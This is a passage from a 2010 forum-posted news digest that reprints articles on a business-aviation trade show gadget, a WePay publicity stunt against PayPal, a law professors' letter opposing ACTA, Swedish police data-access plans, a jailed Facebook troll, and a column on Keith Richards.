As if I needed reminding, the business aviation convention attracts people selling a lot more than just business jets. This year, there was a wide array of high-end products, like lightweight simulated granite for bathrooms and water purification systems so the highflying set can gargle better. This year, in-flight entertainment gear was hot, from big high-definition screens to inventions like Mr. Afshar’s, the KOR-fx total immersion audio-stimulation system.

That movie clip on his iPod, by the way, consisted of superheroes hollering, shooting guns, driving fast, blowing things up and punching each other. But the sound! The sound turned my chest cavity into a subwoofer. Suddenly, I was intensely drawn into this dumb movie scene.

“Whoa!” I said, removing the gear.

“Right? Right?” said Mr. Afshar, a physicist turned entrepreneur whose KOR-fx invention generated some interest earlier this year at the big annual International Consumer Electronics Show in Las Vegas.

Now, the last thing I need is another electronic marvel to put in a drawer and forget about. But Mr. Afshar’s wearable chest-woofer stopped me literally in my tracks, if only because it was so weirdly different from the usual audio and video gear. And with a price tag of $189.99 (it won’t be available until February, but the company is taking orders), the KOR-fx also struck me as one of the few affordable products on exhibit at the convention.

Of course, you had to consider the alternatives, as many of the approximately 25,000 industry people who attended were doing. Gulfstream, for example, showed off its eagerly anticipated G650 model, a long-range, high-speed business jet. It costs $64.5 million, and Gulfstream says it already has 200 firm orders. There was so much demand to see the new plane and its cabin that Gulfstream parked it in a location separate from the main display of about 100 other business aircraft at DeKalb-Peachtree Airport “simply to manage traffic flow,” said Jeff Miller, a Gulfstream spokesman.

And at the sprawling main aircraft display, Bombardier threw a lavish, crowded party on the tarmac to introduce its two new ultralong-range business jets, the Global 7000 and 8000 models — each priced at around $65 million.

Back at the convention center, Mr. Afshar and his company were working with Flight Display Systems, which makes in-flight entertainment equipment, to demonstrate the KOR-fx system for use by passengers on private jets and other planes. Eventually, Mr. Afshar said, Immerz planned to have a version available for commercial airlines.

Essentially, the KOR-fx is based on technology that generates not just acoustic but also tactile stimulation of the brain. The company also is working on plans to introduce more sophisticated versions of the system for movie theaters and game publishers.

“I personally have been using this, stealthily, on airplanes, flying all over,” Mr. Afshar said. “On a 15-hour flight to Asia, I basically immerse myself. And then all of a sudden, I have arrived, and I realize I just watched five movies.”

He told me, “You were watching just a plain old movie, with plain old movie sound coming through.” The system’s nearly imperceptible chest vibrations, he said, work with neural pathways to produce emotional immersion in a video or a game.

“The technological power is there, you can actually produce effects beyond what you experienced,” he added. “We can produce sensations of wind, sensations of G-forces, loss of balance. And since it activates the part of the brain that deals with emotion and sense of self, it can even produce emotions to match those of the characters in a game or movie. For example, it can stimulate you to cry.”

Hold on a minute there. I think the airlines are way ahead of you on stimulating the urge to cry. They already produce that sensation in customers, and they haven’t even put a price on it.


WePay Drops 600 Pounds Of Ice In Front Of PayPal Conference, Hilarity Ensues
Jason Kincaid

If you’re headed to PayPal’s big developer conference in San Francisco today, you may spot an unusual landmark sitting in front of the Moscone Center: a massive, 600 pound block of ice with hundreds of dollars locked beneath the surface. The frigid booty comes compliments of the WePay team, and they’re trolling PayPal’s conference in an effort to tell everyone in attendance that “PayPal freezes your accounts” and that you should “unfreeze your money”… by switching to WePay, of course.

It’s still early in the day, but the block of ice has already led to quite a bit of drama, including a moderate-speed chase involving a pallet mover. According to WePay cofounder Rich Aberman, the WePay squad wheeled the ice block over to the Moscone Center on a pallet mover and dropped off the cargo without issue. Aberman then quickly dashed away with the mover in tow, which he planned to hide nearby (Moscone security wouldn’t be able to remove the ice block without it).

Aberman made it 2.5 blocks before being chased down by a member of the Moscone security team, who proceeded to grab the pallet mover and wheel it back to the block of ice. After getting the ice back onto the mover, he wheeled it off Moscone property. Now Aberman tells me that the WePay team has resorted to wheeling the ice in a circle around the block.

WePay competes with PayPal on the group payments front. The service makes it easy to accept payments from multiple people, which makes it well-suited for everything from event ticketing to splitting your monthly bills with your roommate (without all the lame IOUs).

In some ways, PayPal has this coming — and not just because of its account freeze issues. Back in its earlier days when it was still sparring with eBay, a group of PayPal employees headed to southern California for a major eBay event. The PayPal team then proceeded to offer conference attendees a chance at winning hundreds of dollars — but only if they wore special PayPal-branded T-shirts to the conference the next day. Many of them did, and eBay got to watch its conference get taken over by a competitor. Of course, eBay then went on to acquire PayPal.

Over 75 Law Profs Call for Halt of ACTA

October 28, 2010

President Barack Obama
1600 Pennsylvania Avenue NW
Washington, DC 20500

Dear President Obama,

As academics dedicated to promoting robust public debate on the laws and public policies affecting the Internet, intellectual property, global innovation policy and the worldwide trade in knowledge goods and services, we write to express our grave concern that your Administration is negotiating a far-reaching international intellectual property agreement behind a shroud of secrecy, with little opportunity for public input, and with active participation by special interests who stand to gain from restrictive new international rules that may harm the public interest.

Your Administration promised to change the way Washington works. You promised to bring increased truthfulness and transparency to our public policy and law, including the Freedom of Information Act. You promised that wherever possible, important policy decisions would be made in public view, and not as the result of secret special interest deals hidden from the American people.

Your Administration’s negotiation of ACTA has been conducted in stark contrast to every one of these promises. In the interest of brevity, we’ll focus here on the three principal ways in which your Administration’s negotiation of ACTA undercuts the credibility of your previous promises.

First, ACTA’s negotiation has been conducted behind closed doors, subject to intense but needless secrecy, with the public shut out and a small group of special interests very much involved. The United States Trade Representative (USTR) has been involved in negotiations relating to ACTA for several years, and there have been drafts of portions of the agreement circulating among the negotiators since the start of negotiations. Despite that, the first official release of a draft text took place only in April, 2010. And following that release the USTR has not held a single public on-the-record meeting to invite comments on the text. Worse, in every subsequent meeting of the negotiating parties, the U.S. has blocked the public release of updated text. The U.S. often has acted alone in banning the distribution of the revised text, contrary to the strong majority view of other negotiating partners to promote public inspection and comment. Because the negotiations have operated on a consensus basis, the U.S. vote against transparency has been dispositive.

This degree of secrecy is unacceptable, unwise, and directly undercuts your oft-repeated promises of openness and transparency. Rather than seeking meaningful public input from the outset, your Administration has allowed the bulk of the public debate to be based upon, at best, hearsay and speculation. Yet, ACTA is a trade agreement setting out a range of new international rules governing intellectual property; as the G-8 called it, a “new international framework.” It is not (the claims of the USTR notwithstanding) related in any way to any standard definition of “national security” or any other interest of the United States similarly pressing or sensitive. The Administration’s determination to hide ACTA from the public creates the impression that ACTA is precisely the kind of backroom special interest deal – undertaken in this case on behalf of a narrow group of U.S. content producers, and without meaningful input from the American public – that you have so often publicly opposed.

Second, the Administration has stated that ACTA will be negotiated and implemented not as a treaty, but as a sole executive agreement. We believe that this course may be unlawful, and it is certainly unwise.

Now that a near-final version of the ACTA text has been released, it is clear that ACTA would usurp congressional authority over intellectual property policy in a number of ways. Some of ACTA’s provisions fail to explicitly incorporate current congressional policy, particularly in the areas of damages and injunctions.[1] Other sections lock in substantive law that may not be well-adapted to the present context, much less the future.[2] And in other areas, the agreement may complicate legislative efforts to solve widely recognized policy dilemmas, including in the area of orphan works, patent reform, secondary copyright liability and the creation of incentives for innovation in areas where the patent system may not be adequate.[3] The agreement is also likely to affect courts’ interpretation of U.S. law.[4]

The use of a sole executive agreement for ACTA appears unconstitutional.[5] The President may only make sole executive agreements that are within his independent constitutional authority.[6] The President has no independent constitutional authority over intellectual property or communications policy, the core subjects of ACTA. To the contrary, the Constitution gives primary authority over these matters to Congress, which is charged with making laws that regulate foreign commerce and intellectual property.[7] ACTA should not be pursued further without congressional oversight and a meaningful opportunity for public debate.

The USTR has insisted that ACTA’s provisions are merely procedural and only about enforcing existing rights. These assertions are simply false. Nearly 100 international intellectual property experts from six continents gathered in Washington, DC in June, 2010 to analyze the potential public interest impacts of the officially released text. Those experts – joined by over 650 other experts and organizations – found that “the terms of the publicly released draft of ACTA threaten numerous public interests, including every concern specifically disclaimed by negotiators.” The expert statement notes that:

• Negotiators claim ACTA will not interfere with citizens’ fundamental rights and liberties; it will.[8]

• They claim ACTA is consistent with the WTO Agreement on Trade Related Aspects of Intellectual Property Rights (TRIPS); it is not.[9]

• They claim ACTA will not increase border searches or interfere with cross-border transit of legitimate generic medicines; it will.[10]

• And they claim that ACTA does not require “graduated response” disconnections of people from the internet; however, the agreement encourages such policies.[11]

Academics and other neutral intellectual property experts have not had time to sufficiently analyze the current text and are unlikely to do so as long as there is no open public forum to submit such analysis in a meaningful process. Rather than create such a forum, the USTR has released text accompanied by the announcement that the negotiations are finished and the time for public comment, which was never granted in the first instance, is over. This is not meaningful, real-time transparency, and it is certainly not the kind of accountability that we were expecting from your Administration. We know enough to know that ACTA’s provisions are of significant interest to the general public, because they touch upon a wide range of public interests and are likely to alter the substantive law governing U.S. citizens. It is clear that before ACTA negotiations proceed further, Congress must be involved.

Third, and finally, we are concerned that the purpose that animates ACTA is being deliberately misrepresented to the American people. The treaty is named the “Anti-Counterfeiting Trade Agreement”. But it has little to do with counterfeiting or controlling the international trade in counterfeit goods. Rather, this agreement would enact much more encompassing changes in the international rules governing trade in a wide variety of knowledge goods – whether they are counterfeit or not – and would establish new intellectual property rules and norms without systematic inquiry into effects of such development on economic and technical innovation in the U.S. or abroad. These norms will affect virtually every American and should be the subject of wide public debate.

Our conclusion is simple: Any agreement of this scope and consequence must be based on a broad and meaningful consultative process, in public, on the record and with open on-going access to proposed negotiating text and must reflect a full range of public interest concerns. For the reasons detailed above, the ACTA negotiations fail to meet these standards.

While you cannot go back in time, you still have the opportunity to allow for meaningful public input, even at this late date. Accordingly, we call on you to direct the USTR to halt its public endorsement of ACTA and subject the text to a meaningful participation process that can influence the shape of the agreement going forward. Specifically, we call on you to direct USTR to:

1. Signal to other negotiators that the U.S. will not sign ACTA before the conclusion of a meaningful public participation process and another round of official negotiations where public participation is encouraged;

2. Hold a meaningful open, on-the-record public hearing on the draft text, the results of which will be used to determine what proposed changes to the agreement the administration will propose;

3. Renounce its position that the agreement is a “sole executive agreement” that can tie Congressional authority to amend intellectual property laws without congressional approval and instead pledge to seek congressional approval of the final text;

4. Consider reforms to the USTR’s industry trade advisory committee (ITAC) process that would allow for a wide range of official advisors;

5. Propose new language for the creation of the ACTA Committee that would require open, transparent and inclusive participation that takes into account the viewpoints of other stakeholders, including inter-governmental organizations (IGOs) and non-governmental organizations, in line with the principles of the World Intellectual Property Organization’s development agenda.[12]


Brook Baker

Northeastern University School of Law

Derek E. Bambauer
Brooklyn Law School

Mark Bartholomew
University at Buffalo Law School

Barton Beebe
New York University School of Law

Yochai Benkler
Harvard Law School

Heidi Bond
Seattle University

Denis Borges Barbosa
Catholic University, Rio de Janeiro

James Boyle
Duke University School of Law

Annemarie Bridy
University of Idaho School of Law

Dan L. Burk
University of California, Irvine

Diane Cabell
Berkman Center, Harvard University

Michael A. Carrier
Rutgers Law School-Camden

Michael Carroll
American University Washington College of Law

Colleen Chien
Santa Clara University School of Law

Andrew Chin
University of North Carolina School of Law

Margaret Chon
Seattle University School of Law

Susan Crawford
Cardozo Law School

Prof. Michael Davis
CSU College of Law

Alexander S. Dent
The George Washington University

Alex Feerst
Stanford Law School Center for Internet & Society

William Fisher
Harvard Law School

Sean Flynn
American University Washington College of Law

Dave Fagundes
Southwestern Law School

Jon M. Garon
Hamline University School of Law

Michael Geist
University of Ottawa School of Law

James Gibson
University of Richmond

Shubha Ghosh
University of Wisconsin School of Law

Debora J. Halbert
University of Hawai`i at Manoa

Robert A. Heverly
Albany Law School of Union University

Cynthia Ho
Loyola University of Chicago School of Law

Dan Hunter
New York University School of Law

Peter Jaszi
American University Washington College of Law

David R. Johnson
New York Law Schoo

Amy Kapczynski
UC Berkeley School of Law

Alex Leavitt
Massachusetts Institute of Technology

Lawrence Lessig
Harvard Law School

David Levine
Elon University School of Law

Jake Linford
Florida State University College of Law

Michael J. Madison
University of Pittsburgh School of Law

Mark McKenna
Notre Dame Law School

Hiram Meléndez-Juarbe
University of Puerto Rico Law School

Gabriel J. Michael
The George Washington University

Viva R. Moffat
University of Denver College of Law

Michael R. Morris
University of Edinburgh

Tyler Ochoa
Santa Clara University School of Law

Kevin Outterson
Boston University

Dr Luigi Palombi
Australian National University

Frank Pasquale
Seton Hall School of Law

Malla Pollack
co-author, Callmann on Unfair Competition, Trademarks, and Monopolies (formerly Univ. of Idaho)

Kenneth L. Port
William Mitchell College of Law

David G. Post
Beasley School of Law, Temple University

Srividhya Ragavan
University of Oklahoma College of Law

R. Anthony Reese
UC Irvine School of Law

Jerome H. Reichman
Duke Law School

Betsy Rosenblatt
Whittier Law School

Patrick S. Ryan
University of Colorado at Boulder

Pam Samuelson
UC Berkeley School of Law

Jason M. Schultz
UC Berkeley School of Law

Susan K. Sell
The George Washington University

Wendy Seltzer
Princeton Center for Information Technology Policy

Jessica Silbey
Suffolk University Law School

Brenda Reddix-Smalls
North Carolina Central University School of Law

Christopher Sprigman
University of Virginia School of Law

Elizabeth Stark
Yale University

Katherine Strandburg
New York University School of Law

Talha Syed
UC Berkeley School of Law

Deborah Tussey
Oklahoma City University School of Law

Jennifer M. Urban
UC Berkeley School of Law

Jonathan Weinberg
Wayne State University

Darryl C. Wilson
Stetson University College of Law

Jane K. Winn
University of Washington School of Law

Peter K. Yu
Drake University Law School

Diane L. Zimmerman
New York University School of Law
Jonathan Zittrain
Harvard Law School


Max Baucus (Montana)

Chuck Grassley (Iowa)

Gary Locke

Hillary Clinton

Cameron F. Kerry

Geovette E. Washington

Quentin Palfrey

Andrew McLaughlin,

Phil J. Weiser

Alan Hoffman

Victoria Espinel

Lisa Garcia

Miriam Sapiro

Daniel Weitzner

Marc Berejka

David Kappos


Sweden to Extend Police Powers on Data Access

The Swedish government wants to extend the powers of police and prosecutors to access personal details from internet service providers in cases of less serious offences such as filesharing, libel and grooming.

Currently, ISPs may be required to hand over IP address and personal details of customers suspected of crimes subject to custodial sentences, but the government wants to extend the law to cover offences that are punishable only by fines.

The proposals are including in a justice department memorandum read by the TT news agency, in which is stated, "Procurement is proposed to be possible for all crimes, namely the requirement that imprisonment should be prescribed for the offence, and that according to the authority's judgement could result in penalties other than fines, should be removed."

Furthermore, it is proposed that the police be given access to information from mobile telephone operators detailing the location of missing persons if there is an established risk to their life or well-being.

The changes are proposed to be introduced in connection with the adoption of the EU Data Retention Directive. Sweden has previously been reluctant to implement the directive, which was approved by Brussels in March 2006.

The Swedish government was instructed by the European Court of Justice in February to adopt the measure and assured the court that the directive would be expected to pass into Swedish law on April 1st.

The directive was passed in the wake of the Madrid and London terrorist bombings. Seen as an important tool in combating terrorism, it raised concerns from privacy advocates. The Swedish justice minister Beatrice Ask has repeatedly expressed reservations over the scope of the powers that it confers.

The news of the the government's proposals has been met with criticism from the Pirate Party.

"It is unfortunately evident that a large surveillance apparatus has been developed to be able to get at regular, honourable people who exchange films and music with each other," wrote Mikael Nilsson of the Pirate Party in a statement on Wednesday.

The Centre Party's Johan Linander, vice chair of the Riksdag Committee on Justice, has also been critical of the directive, which forces ISPs and mobile phone operators to save customer records for six months, but conceded that the proposed changes are positive.

"We can not have legislation which places different demands depending on the nature of the crime, this is broad legislation which gives the police access to this information," he said to Sverige Radio's P3 Nyheter news programme.

"To investigate sexual molestation, libel, insults and grooming, the types of internet crimes which have unfortunately become increasingly common," he added.

Jade Goody Website 'Troll' from Manchester Jailed

An "internet troll" who posted obscene messages on Facebook sites set up in memory of dead people has been jailed.

Colm Coss, of Ardwick, Manchester, posted on a memorial page for Big Brother star Jade Goody and a tribute site to John Paul Massey, a Liverpool boy mauled to death by a dog.

The 36-year-old "preyed on bereaved families" for his "own pleasure", Manchester Magistrates Court heard.

He was jailed for 18 weeks for sending "malicious communications".

The posts included comments claiming he had sex with the victims' dead bodies, the court heard.

Mental health

He was charged under the Communications Act 2003, for sending malicious communications that were grossly offensive.

Unemployed Coss was only caught when he sent residents on his street photos of himself saying he was an internet "troll".

One of the residents passed the photos to police who interviewed him before he eventually admitted to posting abusive messages.

The term "troll" was described in court as someone who creates new identities on Facebook accounts and then posts numerous offensive comments to upset or provoke a reaction from others.

Chairwoman of the bench Pauline Salisbury said: "You preyed on bereaved families who were suffering trauma and anxiety.

"We know you gained pleasure and you aren't sorry for what you did."

The defence raised possible mental health issues but they were dismissed by the bench.

When a Pirate Is the Voice of Chivalry
Maureen Dowd

It’s the Year of the Woman, all right. In a bad way. Some of the women running in high-profile races are not my cup of Tea. And some of the male candidates could be part of the Little Rascals’ He-Man, Woman-Haters Club.

The misogyny reached its zenith outside a Rand Paul debate in Lexington, Ky., on Monday night when a group of Tea Party toughs roughed up a woman from MoveOn.org because she wouldn’t move on.

One man, wearing a “Don’t Tread on Me” button, ripped off her wig and wrestled her to the ground with the help of another man, and a third Paul volunteer stamped his foot on her shoulder when she was down.

In a campaign season when many men — and women — are taking harsh stances that could hurt women, a chivalrous voice has at last arrived.

Oddly enough, it belongs to a renegade pirate whose motto is “Keep it dark”: Keith Richards.

You’d think that an only child whose mother killed all the pets he kept as companions would not grow up to be so positive about women.

“I put a note on her bedroom door, with a drawing of a cat, that said ‘Murderer,’ ” Richards writes in “Life,” his new memoir. “I never forgave her for that.”

His mom, Doris, who didn’t like the muss and fuss, reacted nonchalantly: “Shut up. Don’t be soft.”

But the first thing he did when he began making money with a little band called the Rolling Stones was buy Mum a house.

His reaction when the Stones started to attract hordes of “feral, body-snatching girls” was not titillation but terror. “I was never more in fear for my life than I was from teenage girls,” he writes. “The ones that choked me, tore me to shreds, if you got caught in a frenzied crowd of them — it’s hard to express how frightening they could be. You’d rather be in a trench fighting the enemy than to be faced with this unstoppable killer wave of lust and desire, or whatever it is — it’s unknown even to them.”
He continues: “The problem is if they get their hands on you, they don’t know what to do with you. They nearly strangled me with a necklace, one grabbed one side of it, the other grabbed the other, and they’re going, ‘Keith, Keith,’ and meanwhile they’re choking me.”

The shy English Boy Scout and choirboy who started out with “no chick in the world” describes the women he was involved with — from road flings to his manager to his ex, Anita Pallenberg — with candor but generosity.

Even groupies are accorded respect. “You could look upon them more like the Red Cross,” he says. “They’d wash your clothes, they’d bathe you and stuff.”

Learning that there’s a blind girl who loyally follows the band, he arranges for her to get rides from the group’s truck drivers.

“I’ve been saved by chicks more times than by guys,” he writes. “Sometimes just that little hug and kiss and nothing else happens. Just keep me warm for the night, just hold on to each other when times are hard, times are rough.”

The Prince of Darkness who got in trouble with feminists for “Under My Thumb” is, it turns out, a cuddler who loves strong, high-spirited women.

He had the “unlikely role of consoler” for Mick’s girlfriends when Jagger cheated. “The tears that have been on this shoulder from Jerry Hall, from Bianca, from Marianne, Chrissie Shrimpton ... They’ve ruined so many shirts of mine.” Including when Jerry found a note from one of Mick’s girlfriends written backward that said, “I’ll be your mistress forever.”

“Really good code, Mick!” Richards chides.

The guitarist explained in an interview with NPR’s Terry Gross that the band’s so-called “anti-girl” songs could just as easily be about guys.

“Under My Thumb,” he said, could’ve been about a guy under a woman’s thumb and “you’re just trying to fight back.” Besides, he says, he didn’t write the lyrics — Jagger did.

In the book, he explains: “The songs also came from a lot of frustration from our point of view. You go on the road for a month, you come back, and she’s with somebody else.”

The biggest “seductress” in his life was heroin, he writes, which he relied on to anesthetize him from the “blah blah blah” of show business, something he did not enjoy as much as Jagger.

He said he never collected women, like Jagger and Bill Wyman, or “paid for it,” or indulged women who collected rock stars.

“I’ve never been able to go to bed with a woman just for sex,” writes the author, happily married for decades to the former model Patti Hansen, whom he is supporting through bladder cancer. “I’ve no interest in that. I want to hug you and kiss you and make you feel good and protect you. And get a nice note the next day, stay in touch.”

The consummate gentleman. Who knew?

Until next week,

- js.

Tuesday, November 2nd Is Election Day.

Don't Forget To

Current Week In Review

Recent WiRs -

October 23rd, October 16th, October 9th, October 2nd

Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.

"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black
JackSpratts is offline   Reply With Quote

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Peer-To-Peer News - The Week In Review - February 13th, '10 JackSpratts Peer to Peer 0 10-02-10 07:55 AM
Peer-To-Peer News - The Week In Review - January 30th, '10 JackSpratts Peer to Peer 0 27-01-10 07:49 AM
Peer-To-Peer News - The Week In Review - January 23rd, '10 JackSpratts Peer to Peer 0 20-01-10 09:04 AM
Peer-To-Peer News - The Week In Review - January 16th, '10 JackSpratts Peer to Peer 0 13-01-10 09:02 AM
Peer-To-Peer News - The Week In Review - December 5th, '09 JackSpratts Peer to Peer 0 02-12-09 08:32 AM

All times are GMT -6. The time now is 04:18 PM.

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© www.p2p-zone.com - Napsterites - 2000 - 2024 (Contact grm1@iinet.net.au for all admin enquiries)